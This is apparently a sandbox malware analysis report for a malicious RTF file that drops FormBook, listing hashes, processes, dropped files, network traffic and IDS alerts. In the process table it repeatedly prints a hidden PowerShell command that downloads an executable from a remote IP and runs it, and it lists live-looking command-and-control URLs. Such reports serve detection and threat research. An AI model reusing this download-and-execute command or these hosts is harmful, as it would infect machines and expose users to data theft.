Field | Value
---|---|
File name | ba4df75c2a5c0e1ae63f40e8e81f4469.doc
Full analysis | https://app.any.run/tasks/456f7a21-796b-4847-a3ca-a8661d99d539
Verdict | Malicious activity
Threats | FormBook is a data stealer distributed as MaaS. FormBook differs from much of the competing malware by its extreme ease of use, which allows even inexperienced threat actors to use the FormBook virus.
Analysis date | October 20, 2020, 07:42:27
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | text/rtf
File info | Rich Text Format data, version 1, unknown character set
MD5 | BA4DF75C2A5C0E1AE63F40E8E81F4469
SHA1 | D13FB216D4C18CE70C2E864078B9A67081F9CBE6
SHA256 | 329B2BEAB0F04FF3418020363E781756A72D90D9DFEF91D5134F80C8B749C069
SSDEEP | 1536:9XySTvHyjtHv9Yr9ae2o+CKwNR6+vLUSx+3Bjy6mAgaeeVhMDw5wfLu:95lraRDAw5wf6
Detected type | .rtf: Rich Text Format (100)
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---|
560 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ba4df75c2a5c0e1ae63f40e8e81f4469.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
4072 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2268 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: —; Exit code: 0; Version: 1.0.0.0
948 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
884 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://23.99.216.59/img/images.exe','C:\Users\admin\AppData\Roaming\images.exe');Start-Process 'C:\Users\admin\AppData\Roaming\images.exe'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3580 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: —; Exit code: 0; Version: 1.0.0.0
1540 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | powershell.exe | User: admin; Integrity Level: MEDIUM; Description: —; Exit code: 0; Version: 1.0.0.0
3564 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | images.exe | User: admin; Integrity Level: MEDIUM; Description: —; Exit code: 0; Version: 1.0.0.0
576 | "C:\Windows\System32\taskhost.exe" | C:\Windows\System32\taskhost.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Host Process for Windows Tasks; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2128 | "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | C:\Windows\system32\verclsid.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Extension CLSID Verification Host; Exit code: 3; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---|
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4182.tmp.cvr | — | — | —
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BE4AD31.png | — | — | —
4072 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IML7F8AY2XLHKC4RTSAK.temp | — | — | —
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B5412LBTZZX3O27TE41M.temp | — | — | —
884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PQELP6AD3PDJ1XOFQEQM.temp | — | — | —
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\images[1].exe | executable | CBA223C7EB666479CBE851705FB4EA70 | 1172CE21252D6DD71081C038ED118F2E871D52C500A802BFDB29EE1E7F851B4A
560 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$4df75c2a5c0e1ae63f40e8e81f4469.doc.rtf | pgc | 8B435793BCF58F2C1297F47FAF691081 | 9ACEB034B6DA0C2C7EBEC9CBC75E3983C134F79983A0B4D43E0AFEBE43C2D1AB
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | D6EE8C34E4C28999F00E385C8808E7DE | 39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | D6EE8C34E4C28999F00E385C8808E7DE | 39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
948 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d70c0.TMP | binary | D6EE8C34E4C28999F00E385C8808E7DE | 39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
392 | explorer.exe | GET | — | 46.17.172.156:80 | http://www.mc2.works/ri6/?tZ2x=A5BRKEbhZetAy1pwSLSDHISNjY8GYQNd9PKL/wKBBrR0ncuepv45AB/tLH/9SZn9OVqbjA==&Un0l=GTIL2JL8eD8luN | unknown | — | — | malicious |
4072 | powershell.exe | GET | 200 | 23.99.216.59:80 | http://23.99.216.59/img/images.exe | US | executable | 706 Kb | suspicious |
392 | explorer.exe | GET | 301 | 104.18.136.62:80 | http://www.dylanderoger.com/ri6/?tZ2x=bVwNa6CHIdoenlSEPnMAEKgW46q8BvJ8Osr4oo9ZpQnE1pt+KIevZ6mPvCb4Ucqun99ufw==&Un0l=GTIL2JL8eD8luN | US | html | 200 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
392 | explorer.exe | 46.17.172.156:80 | www.mc2.works | — | — | malicious |
4072 | powershell.exe | 23.99.216.59:80 | — | Microsoft Corporation | US | suspicious |
560 | WINWORD.EXE | 23.99.216.59:80 | — | Microsoft Corporation | US | suspicious |
392 | explorer.exe | 104.18.136.62:80 | www.dylanderoger.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation
---|---|---|
www.dylanderoger.com | | malicious
www.mc2.works | | malicious
www.marketingbiz.info | | unknown
PID | Process | Class | Message |
---|---|---|---|
560 | WINWORD.EXE | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
560 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
560 | WINWORD.EXE | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
560 | WINWORD.EXE | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 |
560 | WINWORD.EXE | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
4072 | powershell.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
4072 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4072 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
392 | explorer.exe | A Network Trojan was detected | SPYWARE [PTsecurity] FormBook |